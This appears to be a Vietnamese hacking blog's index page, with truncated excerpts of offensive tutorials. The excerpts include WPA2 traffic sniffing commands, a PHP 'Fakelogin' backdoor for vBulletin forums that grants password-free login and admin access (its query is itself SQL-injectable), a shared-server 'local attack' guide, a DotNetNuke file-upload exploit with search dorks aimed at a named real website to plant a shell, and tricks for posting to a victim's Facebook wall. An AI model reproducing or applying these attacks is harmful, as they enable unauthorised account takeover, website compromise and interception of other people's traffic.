Sniff and Decrypt WPA2 packet

Mô hình thực hiện của tut: A và B đều biết password wifi của AP ( C ) Mục đích : Trên laptop của mình A sẽ sniff và giải mã các gói tin B-> C Các bước thực hiện : Bước 1 : Các bạn vào : Mã: http://www.wireshark.org/tools/wpa-psk.html Trong đó : Passphrase là password mạng wifi( đã biết) SSID : SSID của mạng wifi ( đã biết) Bấm vào Generate, copy lấy đoạn PSK sinh ra Bước 2: Tại máy của mình A mở cửa sổ terminal gõ các lệnh sau ( dưới quyền root) Mã: iwlist wlan0 scanning Mục đích : tìm thông tin những AP gần với A, chú ý tới channel của AP C( ở đây là channel 10) Gõ tiếp : Mã: iwconfig wlan0 channel 10 Chuyển card mạng wifi máy A sang monitor mode, chỉ lắng nghe trên channel 10 Mã: service NetworkManager stop iwconfig...

Read more »

Fakelogin - Đăng nhập vào forum VBB không cần pass

Fakelogin - Đăng nhập vào forum VBB không cần pass Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass Sau đây là code Code: if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'"); if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'],...

Read more »

Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.

Bài viết này dựa trên kinh nghiệm cũng như những kiến thức mà mình thấy cần thiết nhất và dễ hiểu nhất để dành cho những bạn nào chưa biết đến Local sau khi đọc xong sẽ biết đến nó và có thể thực hành ở đa số các trường hợp. I. Đầu tiên là đọc sơ cái Định Nghĩa của Local Attack là gì cái nào:Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công vào một website có bảo mật kém chung server với website mục tiêu. Sau đó tấn công sang website mục tiêu bằng các kỹ thuật khác nhau để đạt được mục đích cuối cùng đó là chiếm được toàn quyền website mục tiêu (victim).Lấy cái ví dụ cho dễ hiểu:VD1:+ Server là một cái PC có nhiều folder trên đó.+ Mỗi folder tương ứng với 1 user toàn quyền trên nó.+ Local attach đó là làm sao đứng từ folder này dòm...

Read more »

Copyyyyyyyy

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao + có trong tay data và user name nhưng ko biết cách kết nối vào để sử lý dữ liệu đó ra sao Đặt ra nhiều trường hợp ( biết vận động cái đầu chút ) nếu host dùng directadmin admin và koloxo thì vẫn có thể connect đc vào Mysql vẫn có thể update user và pass ( điều nầy thì ko cần nói nhiều) Nhưng nó dùng cpanel thì sao , cái này mới khốn ( trường hợp không có shell nhé) _ Giải pháp cho mấy bé đây + xác định ip và tìm sẵn link admin ( nếu là vbb khi khỏi có cách upload shell qua data) + Máy cài visual 2010 hay bản bao nhiêu thì tùy +http://dev.mysql.com/downloads/connector/net/1.0.html download bản này về import vào C# , để khai báo thư viện...

Read more »

Hack forum với method DNN !!!

tìm các forum lỗi với dork chính sauinurl:/portals/0/default.aspxinurl:/tabid/36/language/en-US/Default.aspx Mình tùy biến đi để có dork cho site việt nam nhéinurl:"/portals/0? site:..vnchọn 1 thằng làm victim nhé,mình chọn thằng này http://www.viglaceraland.vn/chạy trên browser http://www.viglaceraland.vn/Provider...nkgallery.aspxsẽ cho như saunó ko cho up file từ máy tínhta chạy script sau javascript:__doPostBack('ctlURL$cmdUpload','')thì nhận đc lànó đã cho up load từ máy tính nhé.ta up thử 1 file txt nàoup file capuchino.txt nhé chạy thử nha http://www.viglaceraland.vn/Portals/0/capuchino.txt--->từ đây suy ra đường dẫn các file tương tự nhé nó cho up file ảnh,thì ta có thể up shell thông qua up file ảnh nha,trên...

Read more »

Có Thể bạn chưa biết

1.Facebook có thể login bằng các pass khác nhau. Có nghĩa là bạn có thể cónhiều pass khác nhau.Sau đây là các pass tương đương nhau. Ví dụ mình có pass là sAd_CaPuChiNo .Nếu mình hóan đổi các kí tự in hoa bằng kí tự thường và ngược lại.Được pass mới là SaD_cApUcHInO .Thi đây là một pass hợp lệ.Có thể login đc lun. Họăc nếu viết hoa kí tự đầu SAd_CaPuChiNo thì đây cũng là 1 pass hợp lệ. 2.Bạn có thể post lên facebook nguời khác mà không cần đăng nhập ( ko cần pass hay cookie gì cả). Chỉ cần dụ đối tượng vào link sau đây m.facebook.com/upload.php?rdr và dụ victim gửi cái email trong đó cho bạn.Ùi bạn dùng email của mình.Gửi vào email vừa nhận đc.Với subject là dòng nội dung sẽ hiện lên tường của đối tượng đó.Có thể upload hình nữa nha. 3.Có thể bypass verify Phone khi đăng kí Gmail...

Read more »